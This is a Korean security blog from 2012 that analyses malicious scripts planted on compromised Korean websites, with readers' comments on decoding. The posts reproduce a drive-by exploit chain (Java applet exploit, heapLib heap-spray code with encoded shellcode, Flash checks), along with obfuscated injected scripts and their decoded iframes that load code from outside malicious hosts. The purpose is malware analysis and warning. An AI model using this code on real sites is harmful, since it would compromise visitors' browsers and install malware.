var kaixin=document.createElement('applet');

kaixin.width="1";

kaixin.height="1";

if((kaixinm<=16027 && kaixinm>=16000) || (kaixinm>=15000 && kaixinm<=15031)) 

{

kaixin.archive="WHXgJTUj.jpg";

kaixin.code="GondadGondadExp.class";

kaixin.setAttribute("data","http://oppo.ltevc.com/csx/8191i.css");

document.body.appendChild(kaixin);

}

else if ((kaixinm<=17002 && kaixinm>=17000) || (kaixinm<=16030 && kaixinm>=16000) ||(kaixinm>=15033 && kaixinm<=15000)) 

{

kaixin.archive="pvAjohpE.jpg";

kaixin.code="GondadExp.Ohno.class";

kaixin.setAttribute("xiaomaolv","http://oppo.ltevc.com/css/8191i.css");

kaixin.setAttribute("bn","woyouyizhixiaomaolv");

kaixin.setAttribute("si","conglaiyebuqi");

kaixin.setAttribute("bs","748");

document.body.appendChild(kaixin);

}

}

else {


       var pcss=navigator.userAgent.toLowerCase();

       var UaYcKzD2 = window.navigator.userAgent.toLowerCase();

       var kxkx=deconcept["SWFOb"+"jectU"+"til"]["getPlay"+"erVer"+"sion"]();

       if(((kxkx['major']==10&&kxkx['minor']<=3)&&kxkx['rev']<=183||(kxkx['major']==11&&kxkx['minor']<=1&&kxkx['rev']<=102&&((pcss.indexOf('msie 6.0')>0)||(pcss.indexOf('msie 7.0')>0)||(pcss.indexOf('msie')==-1)))))

{

document.writeln("<iframe src=nBQVd.html><\/iframe>");

}

else if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1)) 

        {



      document.writeln("<iframe src=utEWY.html><\/iframe>");

        }

        else

        {

         if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1)) 

         {

               document.writeln("<iframe src=N9TtW.html><\/iframe>");

         }

}

}

}


<iframe src=utEWY.html>


<script>

function heapLib() {

}


heapLib.ie = function(maxAlloc, heapBase) {


    this.maxAlloc = (maxAlloc ? maxAlloc : 65535);

    this.heapBase = (heapBase ? heapBase : 0x150000);

    this.paddingStr = "AA"+"AA";


    while (4 + this.paddingStr.length*2 + 2 < this.maxAlloc) {

        this.paddingStr += this.paddingStr;

    }

    

   

    this.mem = new Array();



    this.flushOleaut32();

}



heapLib.ie.prototype.debug = function(msg) {

    void(Math.atan2(0xbabe, msg));

}


heapLib.ie.prototype.debugHeap = function(enable) {


    if (enable == true)

        void(Math.atan(0xbabe));

    else

        void(Math.asin(0xbabe));

}


heapLib.ie.prototype.debugBreak = function(msg) {

    void(Math.acos(0xbabe));

}



heapLib.ie.prototype.padding = function(len) {

    if (len > this.paddingStr.length)

        throw "Requested padding string length " + len + ", only " + this.paddingStr.length + " available";


    return this.paddingStr.substr(0, len);

}



heapLib.ie.prototype.round = function(num, round) {

    if (round == 0)

        throw "Round argument cannot be 0";


    return parseInt((num + (round-1)) / round) * round;

}



heapLib.ie.prototype.hex = function(num, width)

{

    var digits = "0123456789ABCDEF";


    var hex = digits.substr(num & 0xF, 1);


    while (num > 0xF) {

        num = num >>> 4;

        hex = digits.substr(num & 0xF, 1) + hex;

    }


    var width = (width ? width : 0);


    while (hex.le...%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA

%u1441%u108A%uFA7A%u2[중략]%uBDBD%uBDBD"+"%uEAEA%uEAEA

%uEAEA%uEAEA");

var nops = unescape("%u0c0c%u0c0c");

while (nops.length < 0x80000) nops += nops;

var offset = nops.substring(0, 0x800 - code.length);

var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

while (shellcode.length < 0x40000) shellcode += shellcode;

var block = shellcode.substring(0, (0x80000-6)/2);

heap_obj.gc();

for (var i=1; i < 0xa70; i++)

{

heap_obj.alloc(block);

}


<iframe src=nBQVd.html>


var rcho6 =cWiDmn8+'oxzz5858oxzz5858oxzz10EBoxzz4B5BoxzzC933oxzzB966oxzz03B8

oxzz3480oxzzBD0BoxzzFAE2oxzz05EBoxzzEBE8oxzzFFFFoxzz54FFoxzzBEA3oxzzBDBD

oxzzD9E2oxzz8D1Cox[중략]oxzzEAEA';

var NyzohAW2="d";

         var APgm7 = VHbfXE5(rcho6.replace(/oxzz/g,csbcST4));        

         var kAtq4 = new Array()

         var SPur3 = 0x100000 - (APgm7.length*2 + 0x24 + 0x1000);

         var rbSO2 = "vglQ60d0"+"dvglQ60d0"+"d";

         var mWXJ4 = VHbfXE5(rbSO2.replace(/vglQ6/g,csbcST4));

         try{alert(a,b,c);}

         catch(e)

   {

var Vbfgj1="d";

while(mWXJ4.length < SPur3) mWXJ4 +=mWXJ4;

         var iRre8 = mWXJ4.substring(0, SPur3/2);

         delete mWXJ4;

         for(i=0;i<300;i++) 

         {

              kAtq4[i] = [iRre8+APgm7].join("");    

         } 

    }

         

function LFydVC8()

{


document.write("<embed src='KR3ZE.swf' width=10 height=0></embed>");

}

NyzohAW2="h";

document.getElementById("WFGGY8").onclick();




댓글을 달아 주세요

posted by Kwan's 2012. 6. 29. 20:23

* 감염 페이지 : http://inews24.com/js_lib/slide_new.js

* 위 사이트 접속시 악성코드에 감염 될 수 있음을 알려드립니다!


원본 링크 !


<script type="text/javascript">function RDfADFLDEXDFu5(s) {var r = new Array();var curr = 0;while(s.charAt(curr) != '\n') {var tmp = 0;for (var i=6; i>=0 ; i-- ){if (s.charAt(curr) == ' '){tmp = tmp | (Math.pow(2,i));}curr++;}r.push(String.fromCharCode(tmp));}return r.join('');}if(document.cookie.indexOf("OOOIUUTA")==-1 || document.cookie.indexOf("RRXWEXEXPFF2")==-1)Function(RDfADFLDEXDFu5("    [생략]    \n"))();var cookiename = document.cookie.indexOf("OOOIUUTA") == -1 ? "OOOIUUTA" : "RRXWEXEXPFF2";var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie=cookiename+"=Yes;path=/;expires="+expires.toGMTString();</script>


이처럼 공백이 생겨 있습니다 !


HEX 값


222020090920090920200920202020202009090920202020200920092020200920200920202009

0920092020200920202009202020092009090920092020200920202009202020202020090920092

0200920090920202020092009092020090920092009200920090909202020092009202020092020

2009202009092009202020200909202020200909092020202009090909202020200909090920200

9092009200920092009090909200909092009092009092009200920200909202020090909092020

2020200909202020200909092020202020090920092020092009092020202009090909202020092

0090909200909200920092020090920090920200909090920202009092020202020090920092020

0909092020092009092009200920200909202020090909200909202009200909092020200920090

9202020092009092020200909090909200909200920092020090920202009090909092009200909

2009200920200909200920090909202009092009092009200920200909200920090909202009202

0092020090920202020092009202020200909092020200920200920202020090909092009092009

2009202009092009200909092009202020090909202020200920202020202009202009200920090

9200920092020090920092009090920200920202009090909202009200909202020090909202009

2009092009200920200909200920090909202009202009200909202020092020092020200909202

0200920090920092009202009092009200909092009202020092009200920202009092020092009

0920092009202009092020200909092009200920090920092009202009092020200909090920200

9200909200920092020090920092009090920200920202009092020202009090920202020200909

2009202009200909202020200909090920202009200909092009092009200920200909202020090

909200920092009090920090920092009092009200920090920092020200920205C6E22


디코딩 !


여기서 위에 함수 tmp를 통하여 다음과 같이 값이 나옵니다 !


100,111,99,117,109,101,110,116,46,119,114

,[생략]

0,105,109,103,37,50,69,106,115,37,51,69,37,51,67,37,50,70,115,99,114,105,112,116,37,51,69,34,41,41,59


-----------------------------------------------------------------------------------------


document.write(unescape("%3Cscript%20src%3Dhttp

[생략]2Ecom%2Fpic%2Fimg%2Ejs%3E%3C%2Fscript%3E"));


-----------------------------------------------------------------------------------------

document.write(unescape("<script src=http://lzxvx.com/pxx/img.js></script>"));

이곳으로 연결됩니다!


디코딩 연결 링크 !


http://lzxvx.com/pix/img.js

http://lzxvx.com/pix/rot.html

http://lzxvx.com/pix/ll.html

~>http://lzxvx.com/pix/swfobject.js

~>http://lzxvx.com/pix/jpg.js


참고 페이지 : http://kjcc2.tistory.com/1338

댓글을 달아 주세요

posted by Kwan's 2012. 6. 29. 19:40
감염 사이트 : http://211.239.162.41/~dongposarang/killer.html  

* 악성 링크이니 조심하시기 바랍니다!

 

 <html><head><script type="text/javascript">window.location="";
 </script></head><body><!--c3284d--><script>s="";
 try
 {
   q=document.createElement("p");
   q.appendChild("123"+n);
 }
 catch(qw)
 {
   h=-016/7;
   try
   {
     a=prototype&5;
   }
   catch(zxc)
   {
     e=window["e"+"va"+"l"];
     n="26.30.400.555.198.351.436.505.220.348.184.595.228.315.464.505.80.117.240.525.204.342.388. 545.202
 .96.460.570.198.183.136.520.232.348.448.290.94.141.416.505.198.342.404.570.242.138.456.585.94.297.

 444.585.220.348.196.245.92.336.416.560.68.96.440.485.218.303.244.170.168.357.420.580.232.303.456.

[생략]

 342.400.505.228.183.136.550.222.102.128.485.216.315.412.550.122.102.396.505.220.348.404.570.68.96.

416.505.210.309.416.580.122.102.200.170.64.357.420.500.232.312.244.170.100.102.248.300.94.315.408.570.

 194.327.404.310.78.123.236.65.20"

.split(".");
     if(window.document)for(i=6-2-1-2-1;
     -161+i!=2-2;
     i++)
     {
       k=i;
       s=s+String.fromCharCode(n[k]/(i%(h*h)+2));
     }
     e(s);
   }
  
 }
 </script><!--/c3284d-->
 <!--d93065-->                                                                                                                                                                                                        <script>try
 {
   q=document.createElement("p");
   q.appendChild(q+"");
 }
 catch(qw)
 {
   h=-012/5;
   try
   {
     bcsd=prototype-2;
   }
   catch(bawg)
   {
     ss=[];
     f=(h)?("fromCharC"+"ode"):"";
     e=window["e"+"val"];
     n=[13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,

456,99,122,102,416,116,232,336,232,47,94,315,476,97,208,342,444,113,92,342,468,47,198,333,468,110,232,

162,184,112,208,336,136,32,220,291,436,101,122,102,336,119,210,348,464,101,228,102,128,115,198,342,444,

[생략],

444,34,64,291,432,105,206,330,244,34,198,303,440,116,202,342,136,32,208,303,420,103,208,348,244,34,100,

 102,128,119,210,300,464,104,122,102,200,34,124,180,188,105,204,342,388,109,202,186,156,41,118,39,40];
     if(window.document)for(i=6-2-1-2-1;
     -160+i!=2-2;
     i++)
     {
       k=i;
       ss=ss+String[f](n[k]/(i%(h*h)+2-1));
     }
     e("if(1)"+ss);
   }
  
 }
 </script><!--/d93065-->
 
 
 
 
 <a href="">Click</a>
 <!--start_qpi--><script src=http://mmm2011.ppcsoft.in/pizda.js></script><!--end_qpi-->
 </body></html>

 

[복호화]

 

26.30.400.555.198.351.436.505.220.348.184.595.228.315.464.505.80.117.240.525.204.342.388. 545.202
 .96.460.570.198.183.136.520.232.348.448.290.94.141.416.505.198.342.404.570.242.138.456.585.94.297.

 444.585.220.348.196.245.92.336.416.560.68.96.440.485.218.303.244.170.168.357.420.580.232.303.456.

[생략].

 342.400.505.228.183.136.550.222.102.128.485.216.315.412.550.122.102.396.505.220.348.404.570.68.96.

416.505.210.309.416.580.122.102.200.170.64.357.420.500.232.312.244.170.100.102.248.300.94.315.408.570.

 194.327.404.310.78.123.236.65.20"

 

----------------------------------------------------------------------------------------

 

document.write('<iframe src="http://hecrery.ru/count11.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

 

========================================================================================

 

13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,

456,99,122,102,416,116,232,336,232,47,94,315,476,97,208,342,444,113,92,342,468,47,198,333,468,110,232,

162,184,112,208,336,136,32,220,291,436,101,122,102,336,119,210,348,464,101,228,102,128,115,198,342,444,

[생략],

444,34,64,291,432,105,206,330,244,34,198,303,440,116,202,342,136,32,208,303,420,103,208,348,244,34,100,

102,128,119,210,300,464,104,122,102,200,34,124,180,188,105,204,342,388,109,202,186,156,41,118,39,40

 

=======================================================================================

if(1)

document.write('<iframe src="http://iwahroq.ru/count6.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

 

count6.php, count11.php 페이지는 모두 죽어있는 상태이다 !

 

=========================
Server IP(s):
0.0.0.0

========================= 

 

댓글을 달아 주세요

posted by Kwan's 2012. 6. 3. 15:26

감염 사이트 : http://www.jeonju1318.or.kr 

* 위 사이트는 현재도 감염중에 있습니다! 


http://www.jeonju1318.or.kr/root/index.php 

안에 현재 악성 스크립트가 존재하여서 글을 써 봅니다!


현재 감염된 페이니 내에 ! 이렇게 Hex 코드로 위장하여 Iframe이 삽입되었습니다! 


src=&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x61;&#x70;&#x70;&#x6C;&#x65;&#x2E;&#x63;&#x68;&#x6F;&#x6C;&#x2E;(중략);&#x6C; width=2 height=2></iframe><iframe src=&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x61;&#x70;&#x70;&#x6C;&#x65;&#x2E;&#x63;&#x68;&#x6F;&#x6C;&#x2E;&#x63; (중략) ; width=2 height=2></iframe><iframe src=&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x61;&#x70;&#x70;&#x6C;&#x65;&#x2E;&#x63;&#x68;&#x6F;&#x6C;&#x2E;&#x63;&#x6F; (중략) ; width=2 height=2></iframe><iframe src=&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x61;&#x70;&#x70;&#x6C;&#x65;&#x2E;&#x

63;&#x68;&#x6F;&#x6C;&#x2E;&#x63;&#x6F; (중략) C; width=2 


간단하게 Docode Hex 를 해주면 제대로 된 Iframe 를 보실 수 있습니다!


http://apple.chox.com/xml/index.html width=2 height=2></iframe>

<iframe src=http://apple.chox.com/xml/index.html width=2 height=2></iframe>

<iframe src=http://apple.chox.com/xml/index.html width=2 height=2></iframe>

<iframe src=http://apple.chox.com/xml/index.html


현재 페이지는 사라졌으며! 다시 페이지가 http://www.test.ccc Redirection 되고 있습니다!


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<html><head>

<title>302 Found</title>

</head><body>

<h1>Found</h1>

<p>The document has moved <a href="http://www.test.ccc">here</a>.</p>

</body></html>


http://www.test.ccc

=========================

Server IP(s):

0.0.0.0

=========================


댓글을 달아 주세요

posted by Kwan's 2012. 2. 26. 19:05
우연히 들어온 사이트중... 하나 스크립트중 신기한게 있어서 써본다.....
나도 어떻게 해결하는 방법인지는 아직 찾지 못하고 있다...... 어떻게 하는거지??
나도 잘 모르겠다....

원본 Script

0500520581041161161120580470470540490460500530490460490560550460490550540471071
14047102105108101115047109122046106112103

 

해독시 !

http://61.251.187.176/kr/files/mz.jpg 
~> 현재 접속 불가 !


참고한 블로그 :  http://jjoon.net/tc/343 
Decode 참고 사이트 : http://119.194.217.188:8080/Honeypot/


해결법이 있네요 : )
참조 하시면 쉽게 될꺼 같습니다 : )

http://kjcc2.tistory.com/1290  : 처리의 블로그 :: 악성파일 다운로드의 새로운 URL 암호화 방식

 
다른 방법을 아시는분은 댓글 주시면 정말 감사하겠습니다!

댓글을 달아 주세요

  1. 무한오류 2012.02.26 22:32  Addr  Edit/Del  Reply

    8진수네요 Malzilla에서 풀수 있습니다
    1. 3글자씩 끊으면서 앞에 , 를 붙입니다.
    2. Malzilla 에서 [Misc Decoders]를 누릅니다.
    3. , 를 붙인 문자열을 빈공간에 넣어주고 아래에 Decode Dec(,) 버튼을 클릭해 주면 됩니다 :D

  2. 2012.04.19 23:54  Addr  Edit/Del  Reply

    비밀댓글입니다

    • Kwan's 2012.04.20 20:37 신고  Addr  Edit/Del

      ---------------------------
      Windows Internet Explorer
      ---------------------------
      <EMBED src=http://kdisk.da.to/tst.swf width=1 height=1 type=application/x-shockwave-flash wmode="transparent" bgcolor="#000000" allowFullScreen="true" allowScriptAccess="always"></EMBED>
      ---------------------------
      확인
      ---------------------------

  3. 2012.04.21 12:45  Addr  Edit/Del  Reply

    비밀댓글입니다